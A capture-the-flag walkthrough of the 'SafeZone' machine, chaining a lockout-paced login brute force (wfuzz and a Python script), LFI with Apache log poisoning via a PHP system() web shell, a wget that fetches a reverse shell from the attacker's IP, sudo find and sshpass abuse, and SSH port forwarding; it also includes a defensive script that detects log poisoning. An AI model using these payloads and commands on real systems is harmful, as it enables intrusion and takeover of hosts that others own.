SafeZone

LFI - Apache Log Poisoning - Lateral Move via find - Lateral move via SSH Local Port Forwarding - SSHPass Root flag read

Scanning

Starting off with a Rustscan

The two open ports were 22 SSH and 80 HTTP

Enumeration

Starting off with some HTTP enumeration: because port 80 had a web server running, I scanned it for directories and files with GoBuster

$ gobuster dir -u safezone.thm -w /usr/share/dirb/wordlists/common.txt -x txt,php,sh,cgi,html,zip,bak,sql,old

In the GoBuster results there was an “index.php” page as well. When I went there, I got to a login form

I played around with the login form, trying some default credentials, but I quickly got a message that I had three login attempts in total. After three attempts I had to wait for 60 seconds

So I created a test account with “register.php” to get in and clicked through the tabs at the top. Under “news.php” I found a hint for LFI

And when I got to the “Details” tab, I could find out who I am, but it looked like I had no access to this feature

On the same site I found an interesting comment way down at the bottom

So I was definitely dealing with LFI right here. From the GoBuster scan result I went to the “note.txt” file to check it out and found this message

Message from admin: I can’t remember my password always , that’s why I have saved it in /home/files/pass.txt file

Here I struggled quite a while, because I tried to access this “pass.txt” file through the LFI with the GET parameter I had found in the source code, but as a normal user I had no access to that feature yet

But while searching online I found how Apache exposes home directories (mod_userdir serves a user’s files under /~username/). And that’s it! The file was located at safezone.thm/~files/pass.txt

In here I got the username and the shape of the password: “admin”, two digits, “admin” again. Because that was the only hint, I had to try all 100 two-digit combinations, while keeping in mind that I only had three login attempts per minute. So I generated the candidates with a short bash loop and saved them to a file

for i in {00..99}; do echo $i; done > numbers.txt

The leading zero in the brace expansion pads the one-digit numbers to fit the scheme (00, 01, ... instead of 0, 1), which otherwise has to be done by hand. With that prepared I ran it with wfuzz

wfuzz -c -z file,numbers.txt -d "username=admin&password=adminFUZZadmin&submit=Submit" -X POST -u http://safezone.thm/index.php -s 21
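The same brute force written out as a Python script, added here as an example and not part of the original writeup. It makes the rate-limit handling explicit: one attempt every 21 seconds, and if the lockout message still shows up, it waits out the minute and retries the same candidate instead of silently losing it, which wfuzz with a fixed delay would do. The lockout text (“wait”) and the success indicator (a redirect after the POST) are assumptions that have to be confirmed in Burp first.

```python
#!/usr/bin/env python3
"""Paced password brute force against the SafeZone login (added example).

Assumptions not confirmed by the writeup: the lockout response contains
the word "wait", a successful login answers with a redirect, and a failed
attempt returns 200 with the form again.
"""
import time
import urllib.error
import urllib.parse
import urllib.request

URL = "http://safezone.thm/index.php"   # target from the writeup
USERNAME = "admin"                      # username from pass.txt
PACE = 21            # seconds between attempts: 3 per 60 s is the limit
LOCKOUT_WAIT = 60    # seconds the server enforces after 3 failures
LOCKOUT_HINT = "wait"   # assumed substring of the lockout message


def candidates():
    """admin00admin .. admin99admin, zero padded (the pass.txt pattern)."""
    return [f"admin{i:02d}admin" for i in range(100)]


def classify(status, body):
    """Map one response to 'success', 'locked' or 'fail'."""
    if status in (301, 302, 303):
        return "success"
    if LOCKOUT_HINT in body.lower():
        return "locked"
    return "fail"


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Keep the redirect visible instead of following it."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def attempt(password):
    """POST one candidate and classify the answer."""
    opener = urllib.request.build_opener(NoRedirect)
    data = urllib.parse.urlencode({"username": USERNAME,
                                   "password": password,
                                   "submit": "Submit"}).encode()
    try:
        with opener.open(URL, data=data, timeout=10) as resp:
            return classify(resp.status, resp.read().decode(errors="replace"))
    except urllib.error.HTTPError as e:   # a 302 lands here because of NoRedirect
        return classify(e.code, e.read().decode(errors="replace"))


def brute_force():
    """Walk the candidates at PACE, retrying a candidate after a lockout."""
    for pw in candidates():
        while True:
            result = attempt(pw)
            if result != "locked":
                break
            print(f"[!] locked out, sleeping {LOCKOUT_WAIT}s, retrying {pw}")
            time.sleep(LOCKOUT_WAIT)
        if result == "success":
            return pw
        time.sleep(PACE)
    return None


if __name__ == "__main__":
    found = brute_force()
    print(f"[+] password: {found}" if found else "[-] no hit")
```

Run it with the box up; expect roughly 100 × 21 seconds for a full pass, the same order of magnitude as the wfuzz run.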

After a really long time (-s 21 makes wfuzz wait 21 seconds between requests, which keeps it under three attempts per 60 seconds and avoids the lockout) I finally got the password and logged in as admin. Now I was able to access the feature on the “detail.php” page, which consisted of a text field and a button.

I added the “?page=” parameter and tried some basic LFI paths. By directly entering the location of “/etc/passwd” I got the file content. Here the displayed text was black, so I had to select everything to see it

Initial Compromise

Now with this LFI vulnerability I needed some kind of log file I could write into, to turn it into RCE. To find one I tried the default log locations with Burp and got a hit with “/var/log/apache2/access.log”. In my first run the log file was way too large and I had to restart the machine

After a quick restart I now was able to access the log

Here I started the log poisoning: in the intercepted Burp request I replaced the User-Agent header with this PHP line. It has to go out exactly like this, without URL encoding, because Apache writes the header verbatim into access.log and PHP executes it as soon as the log is included

<?php system($_GET['cmd']); ?>

Then I requested the log through the LFI and passed the command to run in an additional GET parameter

GET /detail.php?page=/var/log/apache2/access.log&cmd=id

And with this I got my command output. Great! I immediately went ahead, served a PHP reverse shell from pentestmonkey with a Python3 web server and pulled it onto the box with wget

GET /detail.php?page=/var/log/apache2/access.log&cmd=wget%20'my-own-ip':8000/rev.php%20-O%20/home/files/rev.php
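For the defender’s side, an added example (not from the writeup) of what this attack leaves behind in access.log and how to flag it: a PHP open tag inside the User-Agent or Referer, and an include-style parameter carrying an absolute path or traversal, possibly next to a command parameter. The log lines are constructed in the shape of the requests above; the list of parameter names to watch is a starting point of my own, not something the box confirms.

```python
#!/usr/bin/env python3
"""Detection of log poisoning and LFI in Apache combined-log lines (added example).

Flags the two artefacts this attack leaves in access.log: a PHP open tag in
the User-Agent (or Referer), and an include parameter pointing at an absolute
path, traversal or stream wrapper, optionally with a command parameter beside
it. The sample lines are constructed, not taken from the box.
"""
import re
import urllib.parse

# Apache "combined" LogFormat; the request line is split into method/target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

PHP_TAG = re.compile(r"<\?(php|=)", re.I)
INCLUDE_PARAMS = {"page", "file", "include", "path"}   # assumed watch list
LOCAL_FILE = re.compile(r"^(/|\.\./|php://|file://|expect://)", re.I)


def analyse(line):
    """Return a list of finding strings for one log line (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    findings = []
    for field in ("ua", "referer"):
        if PHP_TAG.search(m.group(field)):
            findings.append(f"php tag in {field}: {m.group(field)}")
    query = urllib.parse.urlsplit(m.group("target")).query
    params = urllib.parse.parse_qs(query, keep_blank_values=True)
    for name, values in params.items():
        if name.lower() not in INCLUDE_PARAMS:
            continue
        for v in values:
            if LOCAL_FILE.search(v):
                findings.append(f"local file include via {name}={v}")
                if "cmd" in params:
                    findings.append(f"command parameter: cmd={params['cmd'][0]}")
    return findings


SAMPLE = [  # constructed lines in the shape of the writeup's traffic
    '10.0.0.5 - - [10/Jan/2023:10:00:01 +0000] "GET /news.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    "10.0.0.5 - - [10/Jan/2023:10:00:09 +0000] \"GET / HTTP/1.1\" 200 512 \"-\" \"<?php system($_GET['cmd']); ?>\"",
    '10.0.0.5 - - [10/Jan/2023:10:00:15 +0000] "GET /detail.php?page=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 99999 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Jan/2023:10:00:20 +0000] "GET /detail.php?page=../../../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def scan(lines):
    """Map each suspicious line to its findings; clean lines are left out."""
    result = {}
    for line in lines:
        found = analyse(line)
        if found:
            result[line] = found
    return result


if __name__ == "__main__":
    for line, found in scan(SAMPLE).items():
        print(line)
        for f in found:
            print("   ->", f)
```

The PHP-tag check is the high-signal one: a browser never sends `<?php` in its User-Agent, so a single hit is worth an alert, while the path check will also catch ordinary LFI probing.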

Lateral Move (www => files)

While checking some basic privilege escalation vectors I ran sudo -l, which showed that I was allowed to run /usr/bin/find as the user “files”

With GTFOBins I got the command to elevate my privileges to the “files” user

sudo -u files /usr/bin/find . -exec /bin/sh \; -quit

Lateral Move (files => yash)

I checked sudo -l again as “files” and got another command

But I wasn’t able to execute it right now, because sudo asked for the password of “files”. In the home directory of “files” I saw the “pass.txt” file and another one with a fancy name

In the file with the long filename I got a password hash of the “files” user. I cracked it with John

sudo john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

With this I obtained the password and logged in via SSH. Then I was able to execute the sudo command

It just showed the ID of the user I provided. Because there was no entry on GTFOBins and no further use, I left the binary alone

Port Tunneling

I checked some more things. With this one I found a service on port 8000 that had not shown up in the port scan, so it was only listening locally

ss -tulpn

I used SSH local port forwarding to make that port reachable on my own machine (-fN puts the session in the background without running a remote command)

ssh -L 8002:localhost:8000 files@safezone.thm -fN

On my local port 8002 I reached the web server, but the root page immediately returned a 403

When I ran GoBuster on that port, I got one interesting result

gobuster dir -u http://localhost:8002 -w /usr/share/dirb/wordlists/common.txt -x html,txt

Here I found a basic login form

I inspected the source code and saw that it loaded a file called “login.js”

The credential check happened in that script, client-side, with the username and password compared in plain text, so I just read them out

Reverse Shell

With those credentials I got in and got to the “pentest.php” site

Commands like id and whoami returned nothing, so some commands were blocked by a blacklist. Writing a file, however, worked

echo "hi" > /home/files/test.txt

Then I ran the following command to make the file world-writable (and, as a side effect, executable)

chmod 777 /home/files/test.txt

It totally worked: I could edit the file as the “files” user, even though it was owned by “yash”, which also told me that pentest.php was running my commands as “yash”

That way I was able to write a reverse shell into a file from my shell as “files”, without having to get it past the command blacklist of the web form. So I created the file and gave it the permissions as I did before (chmod 777 also makes it executable, which is needed to run it by path). Then I wrote the reverse shell into it and saved it

I set up my netcat listener and executed the reverse shell by entering the full path of the script into the form field

Privilege Escalation => Root

Now as the user “yash” I got another output for the sudo -l command

I tested the full command by simply executing it

sudo /usr/bin/python3 /root/bk.py

I played around with it, and when I just hit enter at the prompt, I got the help message from “sshpass”, so the script was building an sshpass command from my input

So I executed the command once again and tried to transfer the “root.txt” file to the home directory of “yash”. For the password I entered a random string; any input worked there

And after all this I finally got the root flag in the directory I entered and was able to read the content of it
